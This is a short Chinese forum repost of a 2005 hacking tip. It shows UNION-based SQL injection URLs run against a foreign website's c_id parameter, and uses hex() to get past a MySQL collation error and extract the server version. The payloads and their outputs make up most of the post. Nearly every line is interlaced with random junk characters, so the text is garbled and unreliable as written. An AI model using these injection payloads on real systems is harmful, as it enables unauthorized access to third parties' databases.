本文作者:SuperHei: A4 W2 Q: ~0 n2 X2 q# S! M5 M* {
文章性质:原创
- V' {8 d$ s K) R6 k( R发布日期:2005-10-18
- ~& @( F: A6 j( n测试个国外的站时:
6 M7 z( {1 V. ?$ j, X! S" nurl:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*7 c3 F A/ u# X! w' g X( G
返回错误:
D4 S/ `4 s/ s1 Z% ~ M, HIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
0 d5 f( H- {" O1 K3 @; [MySQL Error No. 126
) Z8 F# N. R' w- x: y0 Z, ^看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。* F4 E5 \& U$ N+ i
解决办法:转为其他编码如hex。2 ~* P* ~0 q, u }2 T: ^
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*4 }3 C" T' C/ T C& l
成功得到hex(version())的值为:9 o! e8 R8 D# M9 `$ a
342E312E332D62657461
' ^" z& p9 j7 S' z回Mysql查询下得到:
O q8 h/ z. e. c, L- ymysql> select 0x342E312E332D62657461;- d8 l9 H# ^3 C" B4 h' Y* J
+------------------------+% H/ W- n* _0 k8 x+ V
| 0x342E312E332D62657461 |! r2 R/ T/ i5 e1 T. y$ n
+------------------------+8 k3 k# P# g Z& M1 a2 p% u
| 4.1.3-beta |: e. Y) F6 h- i) l3 p5 f
+------------------------+2 \+ }6 g- N5 X
1 row in set (0.00 sec)$ [* ?) N8 b; ]$ f
8 v$ ~& V. N9 c6 \& ~/ D |
发表于 2012-9-15 14:04:54
收藏
支持
反对